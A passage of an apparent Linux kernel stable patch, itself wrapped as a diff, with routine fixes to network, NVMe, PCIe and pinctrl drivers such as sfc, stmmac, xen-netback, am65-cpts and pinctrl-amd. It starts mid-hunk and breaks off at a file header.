+-			NETIF_F_GSO_UDP_TUNNEL_CSUM | NETIF_F_GSO_GRE_CSUM;
++	tun_feats = NETIF_F_GSO_UDP_TUNNEL | NETIF_F_GSO_GRE |
++		    NETIF_F_GSO_UDP_TUNNEL_CSUM | NETIF_F_GSO_GRE_CSUM;
++	tso_feats = NETIF_F_TSO | NETIF_F_TSO6;
+ 
+-		hw_enc_features |= encap_tso_features | NETIF_F_TSO;
+-		efx->net_dev->features |= encap_tso_features;
++	if (efx_has_cap(efx, TX_TSO_V2_ENCAP)) {
++		/* If this is first nic_init, or if it is a reset and a new fw
++		 * variant has added new features, enable them by default.
++		 * If the features are not new, maintain their current value.
++		 */
++		if (!(net_dev->hw_features & tun_feats))
++			net_dev->features |= tun_feats;
++		net_dev->hw_enc_features |= tun_feats | tso_feats;
++		net_dev->hw_features |= tun_feats;
++	} else {
++		net_dev->hw_enc_features &= ~(tun_feats | tso_feats);
++		net_dev->hw_features &= ~tun_feats;
++		net_dev->features &= ~tun_feats;
+ 	}
+-	efx->net_dev->hw_enc_features = hw_enc_features;
+ 
+ 	/* don't fail init if RSS setup doesn't work */
+ 	rc = efx->type->rx_push_rss_config(efx, false,
+@@ -4021,7 +4032,10 @@ static unsigned int efx_ef10_recycle_ring_size(const struct efx_nic *efx)
+ 	 NETIF_F_HW_VLAN_CTAG_FILTER |	\
+ 	 NETIF_F_IPV6_CSUM |		\
+ 	 NETIF_F_RXHASH |		\
+-	 NETIF_F_NTUPLE)
++	 NETIF_F_NTUPLE |		\
++	 NETIF_F_SG |			\
++	 NETIF_F_RXCSUM |		\
++	 NETIF_F_RXALL)
+ 
+ const struct efx_nic_type efx_hunt_a0_vf_nic_type = {
+ 	.is_vf = true,
+diff --git a/drivers/net/ethernet/sfc/efx.c b/drivers/net/ethernet/sfc/efx.c
+index 3a86f1213a051..6a1bff54bc6c3 100644
+--- a/drivers/net/ethernet/sfc/efx.c
++++ b/drivers/net/ethernet/sfc/efx.c
+@@ -1001,21 +1001,18 @@ static int efx_pci_probe_post_io(struct efx_nic *efx)
+ 	}
+ 
+ 	/* Determine netdevice features */
+-	net_dev->features |= (efx->type->offload_features | NETIF_F_SG |
+-			      NETIF_F_TSO | NETIF_F_RXCSUM | NETIF_F_RXALL);
+-	if (efx->type->offload_features & (NETIF_F_IPV6_CSUM | NETIF_F_HW_CSUM)) {
+-		net_dev->features |= NETIF_F_TSO6;
+-		if (efx_has_cap(efx, TX_TSO_V2_ENCAP))
+-			net_dev->hw_enc_features |= NETIF_F_TSO6;
+-	}
+-	/* Check whether device supports TSO */
+-	if (!efx->type->tso_versions || !efx->type->tso_versions(efx))
+-		net_dev->features &= ~NETIF_F_ALL_TSO;
++	net_dev->features |= efx->type->offload_features;
++
++	/* Add TSO features */
++	if (efx->type->tso_versions && efx->type->tso_versions(efx))
++		net_dev->features |= NETIF_F_TSO | NETIF_F_TSO6;
++
+ 	/* Mask for features that also apply to VLAN devices */
+ 	net_dev->vlan_features |= (NETIF_F_HW_CSUM | NETIF_F_SG |
+ 				   NETIF_F_HIGHDMA | NETIF_F_ALL_TSO |
+ 				   NETIF_F_RXCSUM);
+ 
++	/* Determine user configurable features */
+ 	net_dev->hw_features |= net_dev->features & ~efx->fixed_features;
+ 
+ 	/* Disable receiving frames with bad FCS, by default. */
+diff --git a/drivers/net/ethernet/smsc/smsc911x.c b/drivers/net/ethernet/smsc/smsc911x.c
+index a2e511912e6a9..a690d139e1770 100644
+--- a/drivers/net/ethernet/smsc/smsc911x.c
++++ b/drivers/net/ethernet/smsc/smsc911x.c
+@@ -1037,8 +1037,6 @@ static int smsc911x_mii_probe(struct net_device *dev)
+ 		return ret;
+ 	}
+ 
+-	/* Indicate that the MAC is responsible for managing PHY PM */
+-	phydev->mac_managed_pm = true;
+ 	phy_attached_info(phydev);
+ 
+ 	phy_set_max_speed(phydev, SPEED_100);
+@@ -1066,6 +1064,7 @@ static int smsc911x_mii_init(struct platform_device *pdev,
+ 			     struct net_device *dev)
+ {
+ 	struct smsc911x_data *pdata = netdev_priv(dev);
++	struct phy_device *phydev;
+ 	int err = -ENXIO;
+ 
+ 	pdata->mii_bus = mdiobus_alloc();
+@@ -1108,6 +1107,10 @@ static int smsc911x_mii_init(struct platform_device *pdev,
+ 		goto err_out_free_bus_2;
+ 	}
+ 
++	phydev = phy_find_first(pdata->mii_bus);
++	if (phydev)
++		phydev->mac_managed_pm = true;
++
+ 	return 0;
+ 
+ err_out_free_bus_2:
+diff --git a/drivers/net/ethernet/stmicro/stmmac/common.h b/drivers/net/ethernet/stmicro/stmmac/common.h
+index ec9c130276d89..54bb072aeb2d3 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/common.h
++++ b/drivers/net/ethernet/stmicro/stmmac/common.h
+@@ -532,7 +532,6 @@ struct mac_device_info {
+ 	unsigned int xlgmac;
+ 	unsigned int num_vlan;
+ 	u32 vlan_filter[32];
+-	unsigned int promisc;
+ 	bool vlan_fail_q_en;
+ 	u8 vlan_fail_q;
+ };
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c b/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c
+index e5cfde1cbd5ce..188a00065f66c 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c
+@@ -481,12 +481,6 @@ static int dwmac4_add_hw_vlan_rx_fltr(struct net_device *dev,
+ 	if (vid > 4095)
+ 		return -EINVAL;
+ 
+-	if (hw->promisc) {
+-		netdev_err(dev,
+-			   "Adding VLAN in promisc mode not supported\n");
+-		return -EPERM;
+-	}
+-
+ 	/* Single Rx VLAN Filter */
+ 	if (hw->num_vlan == 1) {
+ 		/* For single VLAN filter, VID 0 means VLAN promiscuous */
+@@ -536,12 +530,6 @@ static int dwmac4_del_hw_vlan_rx_fltr(struct net_device *dev,
+ {
+ 	int i, ret = 0;
+ 
+-	if (hw->promisc) {
+-		netdev_err(dev,
+-			   "Deleting VLAN in promisc mode not supported\n");
+-		return -EPERM;
+-	}
+-
+ 	/* Single Rx VLAN Filter */
+ 	if (hw->num_vlan == 1) {
+ 		if ((hw->vlan_filter[0] & GMAC_VLAN_TAG_VID) == vid) {
+@@ -566,39 +554,6 @@ static int dwmac4_del_hw_vlan_rx_fltr(struct net_device *dev,
+ 	return ret;
+ }
+ 
+-static void dwmac4_vlan_promisc_enable(struct net_device *dev,
+-				       struct mac_device_info *hw)
+-{
+-	void __iomem *ioaddr = hw->pcsr;
+-	u32 value;
+-	u32 hash;
+-	u32 val;
+-	int i;
+-
+-	/* Single Rx VLAN Filter */
+-	if (hw->num_vlan == 1) {
+-		dwmac4_write_single_vlan(dev, 0);
+-		return;
+-	}
+-
+-	/* Extended Rx VLAN Filter Enable */
+-	for (i = 0; i < hw->num_vlan; i++) {
+-		if (hw->vlan_filter[i] & GMAC_VLAN_TAG_DATA_VEN) {
+-			val = hw->vlan_filter[i] & ~GMAC_VLAN_TAG_DATA_VEN;
+-			dwmac4_write_vlan_filter(dev, hw, i, val);
+-		}
+-	}
+-
+-	hash = readl(ioaddr + GMAC_VLAN_HASH_TABLE);
+-	if (hash & GMAC_VLAN_VLHT) {
+-		value = readl(ioaddr + GMAC_VLAN_TAG);
+-		if (value & GMAC_VLAN_VTHM) {
+-			value &= ~GMAC_VLAN_VTHM;
+-			writel(value, ioaddr + GMAC_VLAN_TAG);
+-		}
+-	}
+-}
+-
+ static void dwmac4_restore_hw_vlan_rx_fltr(struct net_device *dev,
+ 					   struct mac_device_info *hw)
+ {
+@@ -718,22 +673,12 @@ static void dwmac4_set_filter(struct mac_device_info *hw,
+ 	}
+ 
+ 	/* VLAN filtering */
+-	if (dev->features & NETIF_F_HW_VLAN_CTAG_FILTER)
++	if (dev->flags & IFF_PROMISC && !hw->vlan_fail_q_en)
++		value &= ~GMAC_PACKET_FILTER_VTFE;
++	else if (dev->features & NETIF_F_HW_VLAN_CTAG_FILTER)
+ 		value |= GMAC_PACKET_FILTER_VTFE;
+ 
+ 	writel(value, ioaddr + GMAC_PACKET_FILTER);
+-
+-	if (dev->flags & IFF_PROMISC && !hw->vlan_fail_q_en) {
+-		if (!hw->promisc) {
+-			hw->promisc = 1;
+-			dwmac4_vlan_promisc_enable(dev, hw);
+-		}
+-	} else {
+-		if (hw->promisc) {
+-			hw->promisc = 0;
+-			dwmac4_restore_hw_vlan_rx_fltr(dev, hw);
+-		}
+-	}
+ }
+ 
+ static void dwmac4_flow_ctrl(struct mac_device_info *hw, unsigned int duplex,
+diff --git a/drivers/net/ethernet/ti/am65-cpsw-nuss.c b/drivers/net/ethernet/ti/am65-cpsw-nuss.c
+index 00911e9360525..8ff1c84a23ce7 100644
+--- a/drivers/net/ethernet/ti/am65-cpsw-nuss.c
++++ b/drivers/net/ethernet/ti/am65-cpsw-nuss.c
+@@ -2817,6 +2817,7 @@ static int am65_cpsw_nuss_probe(struct platform_device *pdev)
+ 
+ err_free_phylink:
+ 	am65_cpsw_nuss_phylink_cleanup(common);
++	am65_cpts_release(common->cpts);
+ err_of_clear:
+ 	of_platform_device_destroy(common->mdio_dev, NULL);
+ err_pm_clear:
+@@ -2845,6 +2846,7 @@ static int am65_cpsw_nuss_remove(struct platform_device *pdev)
+ 	 */
+ 	am65_cpsw_nuss_cleanup_ndev(common);
+ 	am65_cpsw_nuss_phylink_cleanup(common);
++	am65_cpts_release(common->cpts);
+ 
+ 	of_platform_device_destroy(common->mdio_dev, NULL);
+ 
+diff --git a/drivers/net/ethernet/ti/am65-cpts.c b/drivers/net/ethernet/ti/am65-cpts.c
+index e2f0fb286143b..9948ac14e68db 100644
+--- a/drivers/net/ethernet/ti/am65-cpts.c
++++ b/drivers/net/ethernet/ti/am65-cpts.c
+@@ -918,14 +918,13 @@ static int am65_cpts_of_parse(struct am65_cpts *cpts, struct device_node *node)
+ 	return cpts_of_mux_clk_setup(cpts, node);
+ }
+ 
+-static void am65_cpts_release(void *data)
++void am65_cpts_release(struct am65_cpts *cpts)
+ {
+-	struct am65_cpts *cpts = data;
+-
+ 	ptp_clock_unregister(cpts->ptp_clock);
+ 	am65_cpts_disable(cpts);
+ 	clk_disable_unprepare(cpts->refclk);
+ }
++EXPORT_SYMBOL_GPL(am65_cpts_release);
+ 
+ struct am65_cpts *am65_cpts_create(struct device *dev, void __iomem *regs,
+ 				   struct device_node *node)
+@@ -1003,18 +1002,12 @@ struct am65_cpts *am65_cpts_create(struct device *dev, void __iomem *regs,
+ 	}
+ 	cpts->phc_index = ptp_clock_index(cpts->ptp_clock);
+ 
+-	ret = devm_add_action_or_reset(dev, am65_cpts_release, cpts);
+-	if (ret) {
+-		dev_err(dev, "failed to add ptpclk reset action %d", ret);
+-		return ERR_PTR(ret);
+-	}
+-
+ 	ret = devm_request_threaded_irq(dev, cpts->irq, NULL,
+ 					am65_cpts_interrupt,
+ 					IRQF_ONESHOT, dev_name(dev), cpts);
+ 	if (ret < 0) {
+ 		dev_err(cpts->dev, "error attaching irq %d\n", ret);
+-		return ERR_PTR(ret);
++		goto reset_ptpclk;
+ 	}
+ 
+ 	dev_info(dev, "CPTS ver 0x%08x, freq:%u, add_val:%u\n",
+@@ -1023,6 +1016,8 @@ struct am65_cpts *am65_cpts_create(struct device *dev, void __iomem *regs,
+ 
+ 	return cpts;
+ 
++reset_ptpclk:
++	am65_cpts_release(cpts);
+ refclk_disable:
+ 	clk_disable_unprepare(cpts->refclk);
+ 	return ERR_PTR(ret);
+diff --git a/drivers/net/ethernet/ti/am65-cpts.h b/drivers/net/ethernet/ti/am65-cpts.h
+index cf9fbc28fd032..c0ae0117e5737 100644
+--- a/drivers/net/ethernet/ti/am65-cpts.h
++++ b/drivers/net/ethernet/ti/am65-cpts.h
+@@ -18,6 +18,7 @@ struct am65_cpts_estf_cfg {
+ };
+ 
+ #if IS_ENABLED(CONFIG_TI_K3_AM65_CPTS)
++void am65_cpts_release(struct am65_cpts *cpts);
+ struct am65_cpts *am65_cpts_create(struct device *dev, void __iomem *regs,
+ 				   struct device_node *node);
+ int am65_cpts_phc_index(struct am65_cpts *cpts);
+@@ -29,6 +30,10 @@ int am65_cpts_estf_enable(struct am65_cpts *cpts, int idx,
+ 			  struct am65_cpts_estf_cfg *cfg);
+ void am65_cpts_estf_disable(struct am65_cpts *cpts, int idx);
+ #else
++static inline void am65_cpts_release(struct am65_cpts *cpts)
++{
++}
++
+ static inline struct am65_cpts *am65_cpts_create(struct device *dev,
+ 						 void __iomem *regs,
+ 						 struct device_node *node)
+diff --git a/drivers/net/ieee802154/ca8210.c b/drivers/net/ieee802154/ca8210.c
+index 0b0c6c0764fe9..d0b5129439ed6 100644
+--- a/drivers/net/ieee802154/ca8210.c
++++ b/drivers/net/ieee802154/ca8210.c
+@@ -1902,10 +1902,9 @@ static int ca8210_skb_tx(
+ 	struct ca8210_priv  *priv
+ )
+ {
+-	int status;
+ 	struct ieee802154_hdr header = { };
+ 	struct secspec secspec;
+-	unsigned int mac_len;
++	int mac_len, status;
+ 
+ 	dev_dbg(&priv->spi->dev, "%s called\n", __func__);
+ 
+diff --git a/drivers/net/ipa/gsi_trans.c b/drivers/net/ipa/gsi_trans.c
+index 26b7f683a3e17..fa6863c265eb9 100644
+--- a/drivers/net/ipa/gsi_trans.c
++++ b/drivers/net/ipa/gsi_trans.c
+@@ -153,7 +153,7 @@ int gsi_trans_pool_init_dma(struct device *dev, struct gsi_trans_pool *pool,
+ 	 * gsi_trans_pool_exit_dma() can assume the total allocated
+ 	 * size is exactly (count * size).
+ 	 */
+-	total_size = get_order(total_size) << PAGE_SHIFT;
++	total_size = PAGE_SIZE << get_order(total_size);
+ 
+ 	virt = dma_alloc_coherent(dev, total_size, &addr, GFP_KERNEL);
+ 	if (!virt)
+diff --git a/drivers/net/net_failover.c b/drivers/net/net_failover.c
+index 7a28e082436e4..d0c916a53d7ce 100644
+--- a/drivers/net/net_failover.c
++++ b/drivers/net/net_failover.c
+@@ -130,14 +130,10 @@ static u16 net_failover_select_queue(struct net_device *dev,
+ 			txq = ops->ndo_select_queue(primary_dev, skb, sb_dev);
+ 		else
+ 			txq = netdev_pick_tx(primary_dev, skb, NULL);
+-
+-		qdisc_skb_cb(skb)->slave_dev_queue_mapping = skb->queue_mapping;
+-
+-		return txq;
++	} else {
++		txq = skb_rx_queue_recorded(skb) ? skb_get_rx_queue(skb) : 0;
+ 	}
+ 
+-	txq = skb_rx_queue_recorded(skb) ? skb_get_rx_queue(skb) : 0;
+-
+ 	/* Save the original txq to restore before passing to the driver */
+ 	qdisc_skb_cb(skb)->slave_dev_queue_mapping = skb->queue_mapping;
+ 
+diff --git a/drivers/net/phy/dp83869.c b/drivers/net/phy/dp83869.c
+index b4ff9c5073a3c..9ab5eff502b71 100644
+--- a/drivers/net/phy/dp83869.c
++++ b/drivers/net/phy/dp83869.c
+@@ -588,15 +588,13 @@ static int dp83869_of_init(struct phy_device *phydev)
+ 						       &dp83869_internal_delay[0],
+ 						       delay_size, true);
+ 	if (dp83869->rx_int_delay < 0)
+-		dp83869->rx_int_delay =
+-				dp83869_internal_delay[DP83869_CLK_DELAY_DEF];
++		dp83869->rx_int_delay = DP83869_CLK_DELAY_DEF;
+ 
+ 	dp83869->tx_int_delay = phy_get_internal_delay(phydev, dev,
+ 						       &dp83869_internal_delay[0],
+ 						       delay_size, false);
+ 	if (dp83869->tx_int_delay < 0)
+-		dp83869->tx_int_delay =
+-				dp83869_internal_delay[DP83869_CLK_DELAY_DEF];
++		dp83869->tx_int_delay = DP83869_CLK_DELAY_DEF;
+ 
+ 	return ret;
+ }
+diff --git a/drivers/net/vmxnet3/vmxnet3_drv.c b/drivers/net/vmxnet3/vmxnet3_drv.c
+index 682987040ea82..da488cbb05428 100644
+--- a/drivers/net/vmxnet3/vmxnet3_drv.c
++++ b/drivers/net/vmxnet3/vmxnet3_drv.c
+@@ -1688,7 +1688,9 @@ not_lro:
+ 			if (unlikely(rcd->ts))
+ 				__vlan_hwaccel_put_tag(skb, htons(ETH_P_8021Q), rcd->tci);
+ 
+-			if (adapter->netdev->features & NETIF_F_LRO)
++			/* Use GRO callback if UPT is enabled */
++			if ((adapter->netdev->features & NETIF_F_LRO) &&
++			    !rq->shared->updateRxProd)
+ 				netif_receive_skb(skb);
+ 			else
+ 				napi_gro_receive(&rq->napi, skb);
+diff --git a/drivers/net/xen-netback/common.h b/drivers/net/xen-netback/common.h
+index 3dbfc8a6924ed..1fcbd83f7ff2e 100644
+--- a/drivers/net/xen-netback/common.h
++++ b/drivers/net/xen-netback/common.h
+@@ -166,7 +166,7 @@ struct xenvif_queue { /* Per-queue data for xenvif */
+ 	struct pending_tx_info pending_tx_info[MAX_PENDING_REQS];
+ 	grant_handle_t grant_tx_handle[MAX_PENDING_REQS];
+ 
+-	struct gnttab_copy tx_copy_ops[MAX_PENDING_REQS];
++	struct gnttab_copy tx_copy_ops[2 * MAX_PENDING_REQS];
+ 	struct gnttab_map_grant_ref tx_map_ops[MAX_PENDING_REQS];
+ 	struct gnttab_unmap_grant_ref tx_unmap_ops[MAX_PENDING_REQS];
+ 	/* passed to gnttab_[un]map_refs with pages under (un)mapping */
+diff --git a/drivers/net/xen-netback/netback.c b/drivers/net/xen-netback/netback.c
+index bf627af723bf9..5c266062c08f0 100644
+--- a/drivers/net/xen-netback/netback.c
++++ b/drivers/net/xen-netback/netback.c
+@@ -334,6 +334,7 @@ static int xenvif_count_requests(struct xenvif_queue *queue,
+ struct xenvif_tx_cb {
+ 	u16 copy_pending_idx[XEN_NETBK_LEGACY_SLOTS_MAX + 1];
+ 	u8 copy_count;
++	u32 split_mask;
+ };
+ 
+ #define XENVIF_TX_CB(skb) ((struct xenvif_tx_cb *)(skb)->cb)
+@@ -361,6 +362,8 @@ static inline struct sk_buff *xenvif_alloc_skb(unsigned int size)
+ 	struct sk_buff *skb =
+ 		alloc_skb(size + NET_SKB_PAD + NET_IP_ALIGN,
+ 			  GFP_ATOMIC | __GFP_NOWARN);
++
++	BUILD_BUG_ON(sizeof(*XENVIF_TX_CB(skb)) > sizeof(skb->cb));
+ 	if (unlikely(skb == NULL))
+ 		return NULL;
+ 
+@@ -396,11 +399,13 @@ static void xenvif_get_requests(struct xenvif_queue *queue,
+ 	nr_slots = shinfo->nr_frags + 1;
+ 
+ 	copy_count(skb) = 0;
++	XENVIF_TX_CB(skb)->split_mask = 0;
+ 
+ 	/* Create copy ops for exactly data_len bytes into the skb head. */
+ 	__skb_put(skb, data_len);
+ 	while (data_len > 0) {
+ 		int amount = data_len > txp->size ? txp->size : data_len;
++		bool split = false;
+ 
+ 		cop->source.u.ref = txp->gref;
+ 		cop->source.domid = queue->vif->domid;
+@@ -413,6 +418,13 @@ static void xenvif_get_requests(struct xenvif_queue *queue,
+ 		cop->dest.u.gmfn = virt_to_gfn(skb->data + skb_headlen(skb)
+ 				               - data_len);
+ 
++		/* Don't cross local page boundary! */
++		if (cop->dest.offset + amount > XEN_PAGE_SIZE) {
++			amount = XEN_PAGE_SIZE - cop->dest.offset;
++			XENVIF_TX_CB(skb)->split_mask |= 1U << copy_count(skb);
++			split = true;
++		}
++
+ 		cop->len = amount;
+ 		cop->flags = GNTCOPY_source_gref;
+ 
+@@ -420,7 +432,8 @@ static void xenvif_get_requests(struct xenvif_queue *queue,
+ 		pending_idx = queue->pending_ring[index];
+ 		callback_param(queue, pending_idx).ctx = NULL;
+ 		copy_pending_idx(skb, copy_count(skb)) = pending_idx;
+-		copy_count(skb)++;
++		if (!split)
++			copy_count(skb)++;
+ 
+ 		cop++;
+ 		data_len -= amount;
+@@ -441,7 +454,8 @@ static void xenvif_get_requests(struct xenvif_queue *queue,
+ 			nr_slots--;
+ 		} else {
+ 			/* The copy op partially covered the tx_request.
+-			 * The remainder will be mapped.
++			 * The remainder will be mapped or copied in the next
++			 * iteration.
+ 			 */
+ 			txp->offset += amount;
+ 			txp->size -= amount;
+@@ -539,6 +553,13 @@ static int xenvif_tx_check_gop(struct xenvif_queue *queue,
+ 		pending_idx = copy_pending_idx(skb, i);
+ 
+ 		newerr = (*gopp_copy)->status;
++
++		/* Split copies need to be handled together. */
++		if (XENVIF_TX_CB(skb)->split_mask & (1U << i)) {
++			(*gopp_copy)++;
++			if (!newerr)
++				newerr = (*gopp_copy)->status;
++		}
+ 		if (likely(!newerr)) {
+ 			/* The first frag might still have this slot mapped */
+ 			if (i < copy_count(skb) - 1 || !sharedslot)
+diff --git a/drivers/nvme/host/ioctl.c b/drivers/nvme/host/ioctl.c
+index 81f5550b670da..8224675f8de25 100644
+--- a/drivers/nvme/host/ioctl.c
++++ b/drivers/nvme/host/ioctl.c
+@@ -387,7 +387,8 @@ static inline struct nvme_uring_cmd_pdu *nvme_uring_cmd_pdu(
+ 	return (struct nvme_uring_cmd_pdu *)&ioucmd->pdu;
+ }
+ 
+-static void nvme_uring_task_meta_cb(struct io_uring_cmd *ioucmd)
++static void nvme_uring_task_meta_cb(struct io_uring_cmd *ioucmd,
++				    unsigned issue_flags)
+ {
+ 	struct nvme_uring_cmd_pdu *pdu = nvme_uring_cmd_pdu(ioucmd);
+ 	struct request *req = pdu->req;
+@@ -408,17 +409,18 @@ static void nvme_uring_task_meta_cb(struct io_uring_cmd *ioucmd)
+ 		blk_rq_unmap_user(req->bio);
+ 	blk_mq_free_request(req);
+ 
+-	io_uring_cmd_done(ioucmd, status, result);
++	io_uring_cmd_done(ioucmd, status, result, issue_flags);
+ }
+ 
+-static void nvme_uring_task_cb(struct io_uring_cmd *ioucmd)
++static void nvme_uring_task_cb(struct io_uring_cmd *ioucmd,
++			       unsigned issue_flags)
+ {
+ 	struct nvme_uring_cmd_pdu *pdu = nvme_uring_cmd_pdu(ioucmd);
+ 
+ 	if (pdu->bio)
+ 		blk_rq_unmap_user(pdu->bio);
+ 
+-	io_uring_cmd_done(ioucmd, pdu->nvme_status, pdu->u.result);
++	io_uring_cmd_done(ioucmd, pdu->nvme_status, pdu->u.result, issue_flags);
+ }
+ 
+ static enum rq_end_io_ret nvme_uring_cmd_end_io(struct request *req,
+@@ -440,7 +442,7 @@ static enum rq_end_io_ret nvme_uring_cmd_end_io(struct request *req,
+ 	 * Otherwise, move the completion to task work.
+ 	 */
+ 	if (cookie != NULL && blk_rq_is_poll(req))
+-		nvme_uring_task_cb(ioucmd);
++		nvme_uring_task_cb(ioucmd, IO_URING_F_UNLOCKED);
+ 	else
+ 		io_uring_cmd_complete_in_task(ioucmd, nvme_uring_task_cb);
+ 
+@@ -462,7 +464,7 @@ static enum rq_end_io_ret nvme_uring_cmd_end_io_meta(struct request *req,
+ 	 * Otherwise, move the completion to task work.
+ 	 */
+ 	if (cookie != NULL && blk_rq_is_poll(req))
+-		nvme_uring_task_meta_cb(ioucmd);
++		nvme_uring_task_meta_cb(ioucmd, IO_URING_F_UNLOCKED);
+ 	else
+ 		io_uring_cmd_complete_in_task(ioucmd, nvme_uring_task_meta_cb);
+ 
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index 100f774bc97fa..60452f6a9f711 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -3547,6 +3547,8 @@ static const struct pci_device_id nvme_id_table[] = {
+ 		.driver_data = NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(0x1d97, 0x2263), /* Lexar NM610 */
+ 		.driver_data = NVME_QUIRK_BOGUS_NID, },
++	{ PCI_DEVICE(0x1d97, 0x1d97), /* Lexar NM620 */
++		.driver_data = NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(0x1d97, 0x2269), /* Lexar NM760 */
+ 		.driver_data = NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_AMAZON, 0x0061),
+diff --git a/drivers/pci/controller/dwc/pcie-designware.c b/drivers/pci/controller/dwc/pcie-designware.c
+index 9e4d96e5a3f5a..575834cae3b9e 100644
+--- a/drivers/pci/controller/dwc/pcie-designware.c
++++ b/drivers/pci/controller/dwc/pcie-designware.c
+@@ -645,11 +645,6 @@ void dw_pcie_setup(struct dw_pcie *pci)
+ 		dw_pcie_writel_dbi(pci, PCIE_LINK_WIDTH_SPEED_CONTROL, val);
+ 	}
+ 
+-	val = dw_pcie_readl_dbi(pci, PCIE_PORT_LINK_CONTROL);
+-	val &= ~PORT_LINK_FAST_LINK_MODE;
+-	val |= PORT_LINK_DLL_LINK_EN;
+-	dw_pcie_writel_dbi(pci, PCIE_PORT_LINK_CONTROL, val);
+-
+ 	if (of_property_read_bool(np, "snps,enable-cdm-check")) {
+ 		val = dw_pcie_readl_dbi(pci, PCIE_PL_CHK_REG_CONTROL_STATUS);
+ 		val |= PCIE_PL_CHK_REG_CHK_REG_CONTINUOUS |
+@@ -657,6 +652,11 @@ void dw_pcie_setup(struct dw_pcie *pci)
+ 		dw_pcie_writel_dbi(pci, PCIE_PL_CHK_REG_CONTROL_STATUS, val);
+ 	}
+ 
++	val = dw_pcie_readl_dbi(pci, PCIE_PORT_LINK_CONTROL);
++	val &= ~PORT_LINK_FAST_LINK_MODE;
++	val |= PORT_LINK_DLL_LINK_EN;
++	dw_pcie_writel_dbi(pci, PCIE_PORT_LINK_CONTROL, val);
++
+ 	of_property_read_u32(np, "num-lanes", &pci->num_lanes);
+ 	if (!pci->num_lanes) {
+ 		dev_dbg(pci->dev, "Using h/w default number of lanes\n");
+diff --git a/drivers/pinctrl/pinctrl-amd.c b/drivers/pinctrl/pinctrl-amd.c
+index 32c3edaf90385..5e7b82a2b13d0 100644
+--- a/drivers/pinctrl/pinctrl-amd.c
++++ b/drivers/pinctrl/pinctrl-amd.c
+@@ -865,32 +865,34 @@ static const struct pinconf_ops amd_pinconf_ops = {
+ 	.pin_config_group_set = amd_pinconf_group_set,
+ };
+ 
+-static void amd_gpio_irq_init(struct amd_gpio *gpio_dev)
++static void amd_gpio_irq_init_pin(struct amd_gpio *gpio_dev, int pin)
+ {
+-	struct pinctrl_desc *desc = gpio_dev->pctrl->desc;
++	const struct pin_desc *pd;
+ 	unsigned long flags;
+ 	u32 pin_reg, mask;
+-	int i;
+ 
+ 	mask = BIT(WAKE_CNTRL_OFF_S0I3) | BIT(WAKE_CNTRL_OFF_S3) |
+ 		BIT(INTERRUPT_MASK_OFF) | BIT(INTERRUPT_ENABLE_OFF) |
+ 		BIT(WAKE_CNTRL_OFF_S4);
+ 
+-	for (i = 0; i < desc->npins; i++) {
+-		int pin = desc->pins[i].number;
+-		const struct pin_desc *pd = pin_desc_get(gpio_dev->pctrl, pin);
+-
+-		if (!pd)
+-			continue;
++	pd = pin_desc_get(gpio_dev->pctrl, pin);
++	if (!pd)
++		return;
+ 
+-		raw_spin_lock_irqsave(&gpio_dev->lock, flags);
++	raw_spin_lock_irqsave(&gpio_dev->lock, flags);
++	pin_reg = readl(gpio_dev->base + pin * 4);
++	pin_reg &= ~mask;
++	writel(pin_reg, gpio_dev->base + pin * 4);
++	raw_spin_unlock_irqrestore(&gpio_dev->lock, flags);
++}
+ 
+-		pin_reg = readl(gpio_dev->base + i * 4);
+-		pin_reg &= ~mask;
+-		writel(pin_reg, gpio_dev->base + i * 4);
++static void amd_gpio_irq_init(struct amd_gpio *gpio_dev)
++{
++	struct pinctrl_desc *desc = gpio_dev->pctrl->desc;
++	int i;
+ 
+-		raw_spin_unlock_irqrestore(&gpio_dev->lock, flags);
+-	}
++	for (i = 0; i < desc->npins; i++)
++		amd_gpio_irq_init_pin(gpio_dev, i);
+ }
+ 
+ #ifdef CONFIG_PM_SLEEP
+@@ -943,8 +945,10 @@ static int amd_gpio_resume(struct device *dev)
+ 	for (i = 0; i < desc->npins; i++) {
+ 		int pin = desc->pins[i].number;
+ 
+-		if (!amd_gpio_should_save(gpio_dev, pin))
++		if (!amd_gpio_should_save(gpio_dev, pin)) {
++			amd_gpio_irq_init_pin(gpio_dev, pin);
+ 			continue;
++		}
+ 
+ 		raw_spin_lock_irqsave(&gpio_dev->lock, flags);
+ 		gpio_dev->saved_regs[i] |= readl(gpio_dev->base + pin * 4) & PIN_IRQ_PENDING;
+diff --git a/drivers/pinctrl/pinctrl-at91-pio4.c b/drivers/pinctrl/pinctrl-at91-pio4.c
+index 7f193f2b1566a..0b7cc6f063e00 100644
+--- a/drivers/pinctrl/pinctrl-at91-pio4.c
++++ b/drivers/pinctrl/pinctrl-at91-pio4.c
+@@ -1176,7 +1176,6 @@ static int atmel_pinctrl_probe(struct platform_device *pdev)
+ 		dev_err(dev, "can't add the irq domain\n");
+ 		return -ENODEV;
+ 	}
+-	atmel_pioctrl->irq_domain->name = "atmel gpio";
+ 
+ 	for (i = 0; i < atmel_pioctrl->npins; i++) {
+ 		int irq = irq_create_mapping(atmel_pioctrl->irq_domain, i);
+diff --git a/drivers/pinctrl/pinctrl-ocelot.c b/drivers/pinctrl/pinctrl-ocelot.c
+index 3d5995cbcb782..c1d58939dd89a 100644
+--- a/drivers/pinctrl/pinctrl-ocelot.c
++++ b/drivers/pinctrl/pinctrl-ocelot.c
+@@ -1202,7 +1202,7 @@ static int ocelot_pinmux_set_mux(struct pinctrl_dev *pctldev,
+ 	regmap_update_bits(info->map, REG_ALT(0, info, pin->pin),
+ 			   BIT(p), f << p);
+ 	regmap_update_bits(info->map, REG_ALT(1, info, pin->pin),
+-			   BIT(p), f << (p - 1));
++			   BIT(p), (f >> 1) << p);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/platform/surface/aggregator/bus.c b/drivers/platform/surface/aggregator/bus.c
+index de539938896e2..b501a79f2a08a 100644
+--- a/drivers/platform/surface/aggregator/bus.c
++++ b/drivers/platform/surface/aggregator/bus.c
